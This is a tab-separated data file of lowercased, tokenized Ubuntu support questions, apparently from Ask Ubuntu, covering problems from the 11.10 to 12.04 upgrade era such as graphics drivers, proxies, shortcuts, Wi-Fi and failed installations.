126793	unable to upgrade from 11.10 to 12.04 ( i use a proxy )	dinesh @ dinesh-xps15z : ~ $ sudo nano /etc/apt/sources.list [ sudo ] password for dinesh : dinesh @ dinesh-xps15z : ~ $ sudo nano /etc/apt/sources.list dinesh @ dinesh-xps15z : ~ $ sudo apt-get update get:1 ftp : //ftp.iitm.ac.in oneiric inrelease ign ftp : // ftp.iitm.ac.in oneiric inrelease get:2 ftp : // ftp.iitm.ac.in oneiric-updates inrelease ign ftp : // ftp.iitm.ac.in oneiric-updates inrelease get:3 ftp : // ftp.iitm.ac.in oneiric-security inrelease ign ftp : // ftp.iitm.ac.in oneiric-security inrelease get:4 ftp : // ftp.iitm.ac.in oneiric-proposed inrelease ign ftp : // ftp.iitm.ac.in oneiric-proposed inrelease get:5 ftp : // f tp.iitm.ac.in oneiric-backports inrelease ign ft p : //ft p.iitm.ac.in oneiric-backports inrelease get:6 f tp : //f tp.iitm.ac.in oneiric release.gpg [ 198 b ] get:7 f tp : //ft p.iitm.ac.in oneiric-updates release.gpg [ 198 b ] get:8 f tp : //f tp.iitm.ac.in oneiric-security release.gpg [ 198 b ] hit ft p : //ft p.iitm.ac.in oneiric-proposed release.gpg hit ft p : //ft p. iitm.ac.in oneiric-backports release.gpg hit ft p : //ft p.i itm.ac.in oneiric release hit ft p : //f tp.ii tm.ac.in oneiric-updates release hit ft p : //ft p.iitm.ac.in oneiric-security release hit ft p : //ft p .i itm.ac.in oneiric-proposed release hit ft p : //f tp.iitm.ac.in oneiric-backports release hit ft p : //f tp.iitm.ac.in oneiric/main i386 packages hit ft p : //f tp.i itm.ac.in oneiric/restricted i386 packages hit ft p : //f tp.iitm.ac.in oneiric/multiverse i386 packages hit ft p : //f tp.i itm.ac.in oneiric/universe i386 packages hit ft p : //f t p.ii tm.ac.in oneiric/main translationindex hit ft p : //f tp.iit m.ac.in oneiric/multiverse translationindex hit ft p : //f tp.iitm .ac.in oneiric/restricted translationindex hit ft p : //f tp.iitm . ac.in oneiric/universe translationindex hit ft p : //f tp.iitm.a c.in oneiric-updates/restricted i386 packages hit ft p : //f tp.iitm.ac .in oneiric-updates/multiverse i386 packages hit ft p : //f tp.iitm.ac . in oneiric-updates/universe i386 packages hit ft p : //f tp.iitm.ac.in oneiric-updates/multiverse translationindex hit ft p : //f tp.iitm.ac.i n oneiric-updates/restricted translationindex hit ft p : //f tp.iitm.ac.in oneiric-updates/universe translationindex hit ft p : //ft p.iitm.ac.in oneiric/main translation-en hit ft p : //f tp.iitm.ac.in oneiric/multiverse translation-en hit ft p : //f tp.iitm.ac.in oneiric/restricted translation-en hit ft p : //f tp.iitm.ac.in oneiric/universe translation-en hit ft p : //f tp.iitm.ac.in oneiric-security/restricted i386 packages hit ft p : //f tp.iitm.ac.in oneiric-security/multiverse i386 packages hit ft p : //f tp.iitm.ac.in oneiric-security/universe i386 packages hit ft p : //ft p.iitm.ac.in oneiric-security/multiverse translationindex hit ft p : //f tp.iitm.ac.in oneiric-security/restricted translationindex hit ft p : //f tp.iitm.ac.in oneiric-security/universe translationindex hit ft p : //f tp.iitm.ac.in oneiric-updates/multiverse translation-en hit ft p : //f tp.iitm.ac.in oneiric-proposed/restricted i386 packages hit ft p : //f tp.iitm.ac.in oneiric-proposed/multiverse i386 packages hit ft p : //f tp.iitm.ac.in oneiric-proposed/universe i386 packages hit ft p : //f tp.iitm.ac.in oneiric-proposed/multiverse translationindex hit ft p : //f tp.iitm.ac.in oneiric-proposed/restricted translationindex hit f tp : //f tp.iitm.ac.in oneiric-proposed/universe translationindex hit f tp : //f tp.iitm.ac.in oneiric-updates/restricted translation-en hit ft p : //f tp.iitm.ac.in oneiric-backports/restricted i386 packages hit f tp : //f tp.iitm.ac.in oneiric-backports/multiverse i386 packages hit f tp : //f tp.iitm.ac.in oneiric-backports/universe i386 packages hit f tp : //f tp.iitm.ac.in oneiric-backports/multiverse translationindex hit f tp : //f tp.iitm.ac.in oneiric-backports/restricted translationindex hit ft p : //f tp.iitm.ac.in oneiric-backports/universe translationindex hit f tp : //f tp.iitm.ac.in oneiric-updates/universe translation-en hit f tp : //f tp.iitm.ac.in oneiric-security/multiverse translation-en hit f tp : //f tp.iitm.ac.in oneiric-security/restricted translation-en hit f tp : //f tp.iitm.ac.in oneiric-security/universe translation-en hit f tp : //f tp.iitm.ac.in oneiric-proposed/multiverse translation-en hit f tp : //f tp.iitm.ac.in oneiric-proposed/restricted translation-en hit f tp : //f tp.iitm.ac.in oneiric-proposed/universe translation-en hit f tp : //f tp.iitm.ac.in oneiric-backports/multiverse translation-en hit ftp : //f tp.iitm.ac.in oneiric-backports/restricted translation-en hit f tp : //f tp.iitm.ac.in oneiric-backports/universe translation-en err h tt p : // ppa.launchpad.net oneiric inrelease err htt p : //ppa.launchpad.net oneiric inrelease err htt p : //ppa.launchpad.net oneiric release.gpg unable to connect to ppa.launchpad.net : http : err htt p : //ppa.launchpad.net oneiric release.gpg unable to connect to ppa.launchpad.net : http : err ht tp : //archive.canonical.com oneiric inrelease err htt p : //archive.canonical.com oneiric release.gpg unable to connect to archive.canonical.com : http : [ ip : 91.189.92.191 80 ] 98 % [ connecting to archive.ubuntu.com ( 91.189.88.26 ) ] ^cdinesh @ dinesh-xps15z : ~ $ any ideas ?
126794	running wow on ubuntu , is it possible to fix the weird `` alt '' button behavior ?	i 've managed to get wow working smoothly through wine ( quite impressed ) , but the alt key seems to be behaving weirdly . i 've disabled the `` drag window '' feature so it would n't interfere anymore , but it still has some weird behavior . when playing , to walk i hold w and control direction with the mouse while keeping my finger on right click . if i press the alt key while doing this ( w+rightclick ) , my camera direction is being released and i 'm controlling the cursor instead of the character direction . any idea if there 's a fix for this kind of thing ? i 'm thinking it 's because ubuntu still have some kind of control over the window , can i make wine capture the keyboard/mouse completely ?
126795	enable hardware-accelerated desktop effects with nvidia optimus/bumblebee	i 'm pretty new to linux and i 'm trying to install ubuntu 12.04 on my personal laptop , a dell xps 15 . it has an nvidia gt540m with optimus . conveniently , there 's no way to disable optimus in the bios . lspci output : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 540m ] ( rev a1 ) i have bumblebee installed and it seems to work fine . i 've been using glxgears from mesa-utils to test it . i 'm not sure if this is normal , but running `` glxgears '' by itself gives : error : could n't get an rgb , double-buffered visual but `` optirun glxgears '' works fine , getting framerates around 5800-6000 in 5 seconds . my only issue is that the hardware-accelerated desktop effects are n't working . i ca n't enable wobbly windows or any animations . worst of all , the aero-like window-maximizing effect does n't work . i have n't been able to get that effect enabled at all , even though it worked when i ran off the usb drive . i 'm only assuming it 's linked to my video card issues , but if there 's a way to enable it please let me know ! is it that optirun uses the nvidia drivers , but the intel drivers are n't setup properly ? did i miss a step ? here 's one more screenshot . it 's also worth noting this is a 64 bit install of ubuntu !
126803	ext4 hogs lot of unkown space compared to ext3	ext4 fs has claimed 3 % of partition space . where has this gone and can i get it reclaimed ? i have tried disabling journals for the ext4 partition . even this is not helping . any other tricks i can try to get the space reclaimed other than reverting back to ext3 ? $ lsb_release -cr release : 12.04 codename : precise df -hp |grep media /dev/sda3 21g 430m 20g 3 % /media/mail /dev/sda2 148g 188m 148g 1 % /media/data = > if i move this to ext4 its claiming 2.4g /dev/sda3 on /media/mail type ext4 ( rw , nosuid , nodev , uhelper=udisks ) /dev/sda2 on /media/data type ext3 ( rw , nosuid , nodev , uhelper=udisks ) $ sudo tune2fs -l /dev/sda3 |grep 'reserved block count' reserved block count : 0 $ sudo tune2fs -l /dev/sda2 |grep 'reserved block count' reserved block count : 0 no hidden files or directories $ sudo du -ah * ; pwd 16k lost+found /media/mail
126808	only choice for desktop environment is lubuntu in wubi	good morning , after the release of 12.04 , i tried to install ubuntu on my laptop ( windows 7 home , 4gb ram , t6600 , > 80 gb free space on c ) via wubi ( downloaded from here : windows installer for ubuntu desktop ) . previous experiences with 10.04 - 11.10 have always been positive . after the download however , when presented with the installation dialog , the only option to pick when it comes to the de is `` lubuntu '' , but i want to install ubuntu . on startup , wubi identifies itself as `` ubuntu installer for windows '' ; when started it displays `` lubuntu installation programme '' in the window title . several test with wubi versions on the current ubuntu cd as well as the xubuntu cd yielded exactly the same result . fairly excessive googling has found nothing of interest for this issue .
126815	wireless lan not working on lenovo ideapad s205	i ca n't get the wireless connection on my ideapad s205 to work . i 'm using ubuntu 12.04 . the network manager indicates that wireless was disabled by hardware switch , which is n't true . i checked out various guides but none of them helped me , most likely because of the fact that they were written for 11.04 or 11.10 . how to solve this ?
126817	how to disable alt-f1 / alt-f2 shortcuts ?	i can assign alt+f1 and alt+f2 to any function i like in the keyboard configuration window , but its not beeing used . alt+f1 is always 'dash home ' and alt+f2 is always 'run'
126818	unable to enable bluetooth on a dell n4110	i 'm using ubuntu 11.10 . when i turn on bluetooth and go into 'preferences ' i am unable to move the slider to 'on ' . it just slides back to off . screenshot : i installed blueman bluetooth manager from the software center but it did n't work at all . can anyone tell me how can i enable it ? need to transfer files from my samsung phone .
126821	how to remove 'hints ' from file manager nautilus showing message about selected files and folders ?	i am using ubuntu 12.04 , and the default file manager is nautilus 3.4.1 . one annoying thing is that it shows at the bottom of the display a message of which file or directory currently has the focus/selection on . how can i remove this message ? here is a screen shot notice the yellow message at the bottom . i tried nautilus preferences , and do not see anything there . i tried ubuntu own preferences and nothing there . i tried 'myunity ' configuration tool and see nothing there . i select ubuntu desktop when logging in as user . i assume this is the same as unity ? i am using 12.04 lts , just installed it . thanks .
126822	screen refresh problems following 12.04 upgrade	i just upgraded from 11.10 ( running with no problems ) to 12.04 and find that the screed is not refreshing . open windows do not disappear and when i drag an open window it just replicates self . there is however no problem within a window e.g . firefox works fine . i have a dual screen setup with an nvidia graphics card
126823	unity launcher not displayed when mirror displays selected	i have my laptop plugged into the tv running at resolution 1024x768 . when i open the display settings and select mirror displays the launcher bar disappears . if i clear the setting the launcher reappears and i can use the launcher placement dropdown to select the screen to display it on . how can i get mirror displays working with the unity launcher ?
126824	ca n't open panel settings with super-alt right-click in gnome-classic after resize	in 12.04 , i just tried the pane-setting 'resize ' ( or autoshrink or what it is named ) . now , i do n't like it any longer and i would like to switch back . but since the panel is shrunken , there is no longer a place where i can click ( with super+alt+rightclick ) , i 'm always in one or another application which lies in the panel . so , is there another way than clicking on an empty space in the panel to open the settings ?
126825	installation stops about 3/4 of the way through , nothing happens after i click `` skip ''	okay , at the beginning of the installation , it went well . my laptop is connected to power source , the internet , i have also checked the boxes `` install updates while installation '' , `` install third party plugin '' . after inputting location , keyboard layout info and user 's details and password , the installation took place . but after 3/4 of the installation , it stopped , right above the progress bar , it displayed `` installing system '' , i clicked on the arrow below it , the terminal-like screen also stopped carrying out the process . i then clicked on the `` skip '' button , nothing happens . i thought it was the problem of my laptop , then i did another fresh installation , same thing happened . the terminal-like screen was showing some different words . but it 's not an error message , just some installation info . does anyone have valuable solution to this problem ?
126829	windows moving after losing focus	when i enable the 'place windows ' in the compizconfig settings editor in 12.04 ( gnome-classic ) , windows which are placed over the border of the windows are moved back to the window as soon as the window loses focus . i often like to have windows being only half-way visible . on the other hand , disabling the 'place windows ' option will put newly created windows in position 0x0 , which unfortunately is behind the panel . how can i have smart placing of new windows , but not over existing windows ?
126833	lts to lts upgrade	another question with this url : how do i upgrade from 10.04 or 11.10 to 12.04 ? has this : if you choose to upgrade before then , you can pass the -d option to the upgrade tool , running do-release-upgrade -d or update-manager -d , to upgrade from vanilla 10.04 to 12.04 . am i correct in assuming that if i am actually running 10.04.4 ( not vanilla ? ) that the above command line instructions would not work ? i really do not mind waiting for the gui update manager to show me the availability at 12.04.1 in july . i am just curious .
126834	can i modify unity keyboard shortcut overlay ?	as per this bug comment , shortcuts for the keyboard shortcuts overlay get pulled dynamically from user 's settings . is it possible to change which shortcuts are included ( i.e . show more of them - alt + f9 minimizes window on my computer but it is not included ) ?
126837	whats the easiest way to install windows 7 via usb side by side with ubuntu ( other questions below ) ?	i am trying to install windows 7 side by side with ubuntu . the computer is already running ubuntu and i have partitioned the hard drive formatted it for ntfs and have a usb copy of the .iso of windows 7 . the usb is also formatted for ntfs and contains the .iso of windows . people are telling me that i need to boot my computer from the usb via grub.but i have no idea how to use grub . so i need to know what commands to enter into grub once i have it to boot the computer from the usb ? how to install windows 7 once i have booted off the usb into the blank partition ? my computer is also fairly old so a lot of the recent keyboard commands do n't work . there has to be an easier way to do this . what is that ? what commands to enter into grub to boot my computer off a usb ? how to install windows 7 via usb to a separate partition of my hard drive ?
126839	shared folder access from ubuntu is too slow	i 've a nas . from a windows machine it takes 1 or 2 seconds to access shared folders . from ubuntu ( 11.10 ) it takes half a minute only to shows me the credential dialog box and another half to log in the shared folder . furthermore when i close and reopen my laptop 's lid a broken pipe error is raised and i have to reconnect to the nas .
126840	using two internet connections	sometimes i work in place where i have free wifi , but it requires proxy - and it work only for http ( s ) . in my work i need ssh sometimes . i bought a g4 card , but it has transfer limit so i would like to use g4 only for ssh , and in browser use proxy only . how to configure it properly on ubuntu ?
126841	can my aborted 10.04 to 12.04 upgrade be rescued ?	spent most of yesterday on upgrade from 10.04 to 12.04 , on acer aspire one a110ab ( intel atom processor 1.6ghz , 16gb ssd , 1gb ram , no optical drive ) . had about 2.3gb of free space to begin but cleared more on prompts during upgrade . also got numerous illegible dialogue boxes of squares-for-letters , but 'ok'ed them , i think , on reading that they were an irrelevant evolution artefact . for the last 12 hours the process has been frozen in stage 'installing the upgrades ' , with just 27min left , and the last progress item reading 'installed mousetweeks ' . the last few lines on the terminal read : setting up modemmanager ( ubuntu 0.5.2.0-0ubuntu2 ) ... installing new version of config file /etc/dbus-1/system.d/org.freedesktop.modemmanager.conf ... initctl : method `` get '' with signature `` ss '' on interface `` org.freedesktop.dbus.properties '' does n't exist ... initctl : dbus_error.c:69 : unhandled error from nih_dbus_error_raise : method `` get '' with signature `` ss '' on interface `` org.freedesktop.dbus.properties '' does n't exist aborted at the moment the system appears to be more or less working -- i 'm sending this through chromium on it and i can look for files and edit documents in libreoffice . 'help and support ' does n't open anything . my space is at 1.2gb . usb drives are not recognised . i 'm not linux-technical especially but can follow instruction on the terminal . help , please ? thanks ! harry ps i note that the ( well hidden ) advice for the likes of me was to wait until july . however , given the hype about 12.04 and the widespread raves about its readiness and stability , i thought this was safe enough . i would rather not wipe my computer for a fresh install . edit : i bit the bullet and restarted the netbook , and found i 'm now the proud owner of a unity desktop and an otherwise semi-functional system . update manager says it can only do a 'partial upgrade ' and when it tries it again finds itself blocked by another process .
126844	how to make empathy run on startup ?	i 'm running ubuntu 12.04 . i 'd like empathy to connect when i login to my computer . i know i can browse using the startup applications tool ( although the add/browse dialogue is still useless in gnome 3 ) , but is there a better way ?
126850	how do i use ubuntu server as file server ?	in our company we would like to install ubuntu server for file sharing , is it possible to use ubuntu as file server for windows based client operating systems . what is the procedure to make ubuntu file server , and i have installed ubuntu 12.4 server .
126854	problem connecting internet through usb modem ( micromax )	i recently installed ubuntu 12.04 . but i can not connect to internet via my usb modem . i created the wireless broadband configuration , but it is not shown in the network menu . how can i solve this problem ?
126856	launcher and dash has a red tint after update to 12.04	i just updated to 12.04 , and the launcher looks like it has a more redish color than it used to , i checked the `` online tour '' of 12.04 , and the launcher there seems to be more to the violet end of the spectrum . the dash also seems to have this effect . at first boot i got an error where something called colord had failed . everything else appear to be normal . i am using a nvidia gtx 560 ti card , am i supposed to mess around in nvidia settings and find some color settings there ? it seems strange that it 's only the launcher that is behaving this way . anyone have any ideas ? edit : i have set the opacity of the top panel manually , it 's not a bug .
126857	dual-monitor configuration with one in landscape mode and the other in portrait mode ?	i am currently using two monitors with one in landscape mode and the other in portrait mode . video card is nvidia geforce 9600 gt with nvidia 's propriety driver . i was able to force the issue in 11.10 by assigning a separate x screen for each monitor and rotating the screen assigned to the portrait monitor . ( :0 for the landscape and :1 for the portrait ) i heard that 12.04 improved greatly on multi-monitor configurations . but it does n't work for me : i had to resort to twinview mode in order to take advantage of seamless multi-monitor experience but twinview mode does n't work with my situation where one of the monitor is in portrait mode ! even worse , when i go back to my original configuration , i.e . separate x screens instead of twinview , my portrait monitor shows only white screen with default x cursor without any of unity goodness . anyone familiar with situation similar to mine ?
126858	12.04 german qwerty	keyboard layout `` german ( qwerty ) '' missing since 12.04 states , that german ( qwerty ) was removed in favor of german ( us ) . that layout however is not shown in the configuration dialogue . i tried manually configuring /etc/default/keyboard to xkbmodel= '' pc105 '' xkblayout= '' de '' xkbvariant= '' us '' xkboptions= '' '' but it did n't change anything . any advice ?
126862	how to use integrated intel graphics instead of nvidia graphics on macbook pro ?	i am running ubuntu 12.04 64bit on macbook pro 15 '' 2010 ( macbookpro6,2 ) and i would like to use the integrated intel graphics instead of the dedicated nvidia graphics ubuntu boots with on this machine . i am booting with uefi , not refit or similar . i managed to switch to uefi with the help of this page . this wiki page also contains tips on switching to intel graphics which include some ( for me ) cryptic boot commands to grub . however if i follow the guide , my display stays just black . currently , i am only looking for solution to use intel graphics for ubuntu to save power and keep my macbook cool . dynamic switching or stuff like that is not required .
126863	uget and chrome/chromium download integration	how can i integrate uget and chromium so that any downloads that would usually happen within chromium will occur in uget instead ? please provide a link to any extensions required .
126865	how can i display bookmarks in nautilus quicklist , on precise ?	i read in a lot of websites the new feature of nautilus : the quicklist includes also bookmarks . after installed ubuntu precise on virtualbox , i can not see bookmarks in my quicklist : how can i display bookmarks in the quicklist ?
126867	show windows on all workspaces ? ( scale addon not working )	is there a way to show windows on all workspaces ? i can use alt+tab , after changing behaviour through ccsm , but unity switcher only shows icons , which is very ugly and old-fashioned . showing windows is far more convenient , and very common in modern workspaces , like mac and other linux 's window managers . i 've found a solution , wich involves recompiling compiz ! ! seriously ? ? it sounds like old days : compile it yourself ! . i though ubuntu was different ... removing features from source code is not the way i think . what about flexibility and freedom of choice ? without a a way to see windows in all workspaces you just have to remember in which workspace is the window you are looking for , and the default switcher does not show windows , only generic ( and confusing ) icons . even in windows 7 i can see windows previews to select between different windows of the same program ( file explorer , for example ) . other solution propposed uses the shift switcher , but it does n't work very well and is not as good ( by far ) as scale showing the windows . by the way , all compiz switchers i know are far less useful than scale . is there a way to revert back all scale functionality ? ( no recompiling , please ) . if a developer could compile an uncrippled version of scale and make a downloable deb package ? thanks very much and sorry for my english , is not my native language .
126869	in 12.04 , does zenity crash on you too ?	when i run zenity -- list -- title=111 -- column=222 -- column=333 ab cd ef gh and select any line with a mouse ( or keyboard ) and then click on `` ok '' , i got : $ zenity -- list -- title=111 -- column=222 -- column=333 ab cd ef gh ef segmentation fault ( core dumped ) when i select any line with a mouse ( or keyboard ) and then hit return on my keyboard or double click on said line , i got : $ zenity -- list -- title=111 -- column=222 -- column=333 ab cd ef gh ef is there something wrong with my computer , or does it happen on yours two ? it used to work in 11.10 . if it is not something my-computer-specific , i will report a bug , but this seems strange , i could not google anyone with similar results and i believe zenity is widely used .
126870	icon theme does n't affect some qt-applications	i changed the icon theme in ubuntu 12.04 , but it does n't affect qt-applications . they have the default theme . for kde applications the icon theme can be changed with the systemsettings package . this , however , does not work for some non-kde qt applications . is there a setting i can change to make all qt applications follow suit ?
126871	how to make tamil fonts work in a chat client ?	please tell me how to enable tamil fonts in chat client . i already have the newest version of ibus in 11.10 .
126872	how to get the lost busy cursor when opening file/app back ?	there is a bug report about this in https : //bugs.launchpad.net/ubuntu/+source/nautilus/+bug/862662 , although lately i become unsure whether it really is nautilus bug or not . before installing precise , i tested it by installing pcmanfm to see whether opening files from it shows busy cursor while waiting , but the busy cursor still does n't show up . the busy cursor works in both oneiric and precise live usb , and in the earlier time i use oneiric , it also worked . then , i installed precise , leaving my home folder unformatted , but the problem persists . i also tried to remove the configuration folders and files in my home folder ( actually move it to a folder so that it can be restored ) , log out and log back in , but the problem is still there ( in oneiric , i created a new user to see if it is a configuration problem , though , to no avail either ) . thus , considering that the busy cursor works in the live session , are there any way to get the busy cursor to works normally in the installed system ( such as editing some system configuration ) ? is this a common problem or only occurs on specific hardware ?
126878	two-finger scroll not working in some apps	starting yesterday the two-finger scroll on my laptop seems to be acting up . it works perfectly in almost everything , except gedit and nautilus . i was n't able to find any reference to this issue , albeit searching for a few hours . has anybody experienced this issue ? any ideas what could be the cause ? i 'm running ubuntu 12.04 ( upgraded from 11.10 ) on an asus u36sd with a synaptics touchpad .
126880	upgrade kernel using terminal in ubuntu	is there any possibility to upgrade the kernel by using command in terminal in ubuntu ? if yes , then please reply . please tell if possible that how command works ? thanks
126882	12.04 usb installation problems	i used up a lot of my internets on thursday to download the 32 and 64 bit alternate-install iso 's ... i was totally looking forward to upgrading my netbook over the weekend ! but alas ... no . this is what i have done so far : i checked the md5 's of the iso 's - they check out fine . i used two different usb creators , the one from pendrivelinux and lili . the machine i 'm creating the usb from is a win7 x64 desktop . i 've created the usb several times , and each time the problem is at a different place . this is what happened : at first it tried to mount the cd-rom , and it wo n't let me continue even if i select `` no '' on the question should it remount the cd-rom . this is a netbook - no cd-rom . then on the second attempt it complained about it not being able to find `` /casper/vmlinuz '' or something . like i said the md5 's check out , so that can not be the problem ? and after several attempts to create the usb it still persists ... anyone have an idea what is going on ?
126884	failed 12.04 install , can not boot	was running 11.10 , but decided to upgrade to 12.04 . after more than 12 hours , my dell inspiron 15r was , just hanging . could not do anything . so tried to reboot , all i get now is flashing screen on boot , but nothing more . tried hitting shift before ubuntu loads & then the 1st option but all i get is a purple screen . so tried recovery & can get to a prompt , but how to i now 'recover ' so that i can boot ( load grub ) ? i managed to get it all up & running after remounting / as rw , then setting up my network and finally running dpkg -- configure -a .
126885	eclipse subclipse connector error just after 12.04 upgrade	since the 12.04 upgrade , each time i save within eclipse , i get that error : an internal error occurred during : `` updating change sets for svn workspace '' . selected svn connector library is not available or can not be loaded . subversion and libsvn-java are installed my eclipse.ini holds the java.library.path arg : -djava.library.path=/usr/lib/jni but there is no /usr/lib/jni directory ... in pref > team > svn > svn connector , i have : can not load libraries : could not init class org.tigris.subversion.javahl.svnclient any idea ? edit the path for 32 bits is /usr/lib/i386-linux-gnu/jni
126886	how to change the size and order of the launcher panel ?	i have downloaded 12.04 and installed it under virtualbox . the launcher in its default format is unsuitable for my needs . the two main factors that i need to edit are ( 1 ) the size of the panel ; and ( 2 ) the order in which the launch items are listed . from the settings i have reviewed , it is not clear how to do this . how do i achieve this ?
126891	resolution issue in 12.04	a few months back i installed 12.04 on a separate hard drive just to keep track of developments . during that time i noticed that the resolution was not great , everything seemed just a little blurry . not by huge amounts but just enough to notice it especially after switching from my main 11.10 install . i did n't take a lot of notice as 12.04 was still in its development stage , however now that i have upgraded my primary hard drive to 12.04 final i now have the issue permanently . my graphics card is an nvidia geforce 9300 ge . i have tried both drivers available to me ( no change ) something that does work however is if i change the refresh rate via nvidia settings . it defaults to 75hz which i can change to auto or 60hz , if i make the change to either of those the problem is solved . even though i am saving the settings to /etc/x11/xorg.conf if i log out or reboot it defaults back to 75hz . how can i make this change permanent or should i be looking at changing something else ? thanks for your help
126894	how do i get 1366x768 resolution working on 12.04 with nvidia gtx275	my pc ( vga nvidia gtx275 ) is connected directly to a tv ( philips 42 '' lcd ) and ubuntu does not recognize the native resolution , the closest working resolution is 1280x768 i have tried some xorg tricks found on google but have had no luck any idea how to set the native resolution ?
126895	volume icon from top panel has disappeared after upgrading	i have upgraded my system to 12.04 but the problem is after upgrading the volume icon from the top panel has been disappeared ( in ubuntu classic ) . i tried some of solution like `` indicator applet complete '' but this brings the whole bunch of stuff like `` date and time '' and `` my name '' which i already have . so is there any other way i can bring only that volume icon back .
126898	key short cut `super+l` ( i.e . `win+l` ) not working for `lockscreen` in 12.04 lts	i want to change key short cut to super+l for lockscreen but it is not working . if i try any other combination like ctrl+alt+l or ctrl+alt+g , it works . win+l combination used to work in 11.10 .
126899	continuously asking for partial upgrade	i just upgraded my ubuntu 11.10 to 12.04 after the announcement of the final release of ubuntu 12.04 . the upgrade process went fine . but now when i run the update manager it asks for a partial upgrade . but the funny thing is it installs 84 new packages in installation step , remove all the 84 packages in the cleaning step ! ! ! this is happening recursively ( every time i launch the update manager ) . please can you suggest something ? logs can be found in the launchpad bug page . https : //bugs.launchpad.net/ubuntu/+source/update-manager/+bug/990449
126902	ipv6 privacy extension does not work in 12.04 ?	i have a little problem . my new ubuntu installation become no privacy ipv6 throuth ipv6 privacy extension , whats wrong ? i have read that privacy extension ist enabled per default . but why doese n't work for me ?
126905	nvidia driver can not be installed with jockey for old hardware	i have a geforce fx/5-series card and i can not install the driver using the additional drivers ( jokey ) tool . i just installed ubuntu 12.04 and installed all nvidia drivers , but my drivers are not activated , when i open nvidia settings manager i get the following message : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . can you help me with this ?
126909	how to get the shutdown & restart icon back in dash	in ubuntu 11.10 it was possible to type restart or shutdown in dash , so you could drag that icon in the left panel . now in the new 12.04 this option has been deleted/removed . is there another way to get those icons back ?
126917	can i run ubuntu 12.04 using live cd if i still have ubuntu 11.10 installed on my pc ?	i already have ubuntu 11.10 installed . i have used wubi to install it . i want to know is it safe or okay to use ubuntu live cd of 12.04 lts to test the new functionalities without modifying or changing anything of current ubuntu installation ?
126920	how to assign middle mouse click to two finger tap ?	i have just updated to 12.04 and i am trying to assign two finger tap to my track pad . i know the code , just need to understand how to set it permanently because at the moment i need to input the code into the terminal every time i log on . here is the code and it works . xinput set-int-prop 13 291 8 2 3 0 0 1 2 3 but how do i set this permanently ?
126923	grab handles by three-finger tap not working after upgrade to 12.04	i recently upgrade my ubuntu installation from 11.10 to 12.04 . before the upgrade i was able to use three-finger tapping to bring up the grab-handles . unfortunately , after the upgrade , that functionality is broken , since i can not use the three-finger tap anymore . because the touchpad settings in ubuntu are somewhat limited , i do n't really know what to do right now . i hope someone can help me with that . i 'll be glad to provide more info if needed . edit : the issue is not the gesture , but the binding of grab handles . in ccsm , i can not assign the middle-click to the grab-handle toggle .
126928	system reverts to 87hz refresh rate at every startup after i have installed nvidia drivers	every time the system starts the screen 's refresh rate reverts to 87hz which results in a pixelated and flickery screen which i have to manually correct every time by either selecting 60hz as my refresh rate . i have tried `` save to x configuration files '' and even tried by making the changes as root but to no avail as it again reverts to 87hz on every system startup the open source drivers are okay for regular unity but many games do n't work on it hence i had to install the nvidia drivers . i have been facing this since the beta phase although this is on a fresh installation of 12.04 final release . i am also providing my xorg.conf file just in case it might help http : //paste.ubuntu.com/952196/ also for some reason displays shows my crt monitor as laptop but on open source drivers it was mentioning it as a 14 '' crt only this bug is also present on edubuntu 12.04 this is not present on xubuntu 12.04 i had selected to install updates and 3rd party software on the install and was greeted with a correct refresh rate screen on the boot up . i like xubuntu .
126931	live usb or live cd not booting ?	either it 's live usb or live cd , ubuntu 12.04 wo n't boot on my old laptop . it gives an error with this message all the time : '' this kernel requires the following features not present on the cpu : pae '' is there anything i could do ? i would prefer fresh installing the 12.04 instead of upgrading from 11.10 .
126933	how to make the unity launcher evade active windows in 12.04 ?	in 11.x , my unity launcher remained visible all the time , except when the active window went over it . i can not find the feature in 12.04 anymore . there is only an autohide ( the launcher always hides ) and a no-hide ( a.k.a . panel mode ) option . how can i get the feature back in 12.04 , in unity 3d and in unity 2d ? -- thanks in advance .
126939	keyboard shortcuts for windows	what are the keyboard shortcuts to minimize , maximize , and close windows on ubuntu 12.04 using unity ? alt-f4 to close the window ctrl-super-up to maximize window ctrl-super-down to unmaximize window ctrl-alt-0 to minimize window - does not work for some reason
126944	error : `` fixing recursive fault , but reboot is needed '' need to put acpi off	i having trouble with a acer aspire 2010 . whenever i boot , just one moment after grub i get the error `` fixing recursive fault , but reboot is needed '' . so i searched for it , and i found this workaround : adding acpi=off to grub . now it does boot , but i ca n't power off well . i always need to perform a hard-reset . the computer is running lubuntu 12.04 ( could n't install normal ubuntu due to pae ) . strange is that the live installer runs without problems . also , removing the battery , disconnecting ac , etc ... does n't help . solution ?
126945	how do i get suspend working on a sony vaio p ?	suspend has always been a problem in the sony vaio p ( with the famous gma500 graphics chip ) . in oneiric , coming back from suspend meant a black screen . this could be fixed by following the advice in https : //www.libreoffice.org/bugzilla/show_bug.cgi ? id=42119 which implied adding -- quirk-vbe-post -- quirk-vbemode-restore in the pm configuration . in precise , after suspend the black screen is still there and adding the previous quirks results in a garbled screen that can not be changed even moving to tty1 . any ideas about how suspend can be fixed here ?
126948	volume icon disappeared in the classic desktop . again	i have the same problem as was described in volume icon disappeared in the classic desktop but the answer for that topic provides non equivalent result . take a look at the upper right corner of the original image from the previous topic . there is a single icon for account , online status , and system management . the `` indicator applet complete '' provides a separate icon for each action . this is not the same bar that i had in 11.10 and lost in 12.04 .
126950	gksudo does n't work on ubuntu 12.04 - did work before	i am running this command in a script : $ gksudo wminput -q -r 00:22 : d7 : e2 : a0:18 however it just outputs the manual page . it seems like gksudo is taking the parameters meant to be taken by wminput . could anyone shed any light on this ? cheers-sm .
126959	ubuntu 12.04 fails to load gnome/unity ( ? ) after login	when i try to log in to my account , i am stuck looking at the desktop background , with none of the unity ui ( menu bar , launch bar on the left etc ) loaded . the desktop operates fine - i can right click , select change desktop background , and get into a functional system preferences menu in that manner . that does n't exactly help , though : p i 'm running as a dual boot on a macbook pro ( 5,1 from memory ) . booting in recovery mode and then resuming will get me to a functioning desktop ( apparently without video drivers loaded ) , but it 's ridiculously unresponsive ( the whole boot process in both modes is incredibly slow , actually - it takes minutes on a ssd ) . any idea what 's going wrong ? i assume some component is failing to load and is therefore nuking the boot process .
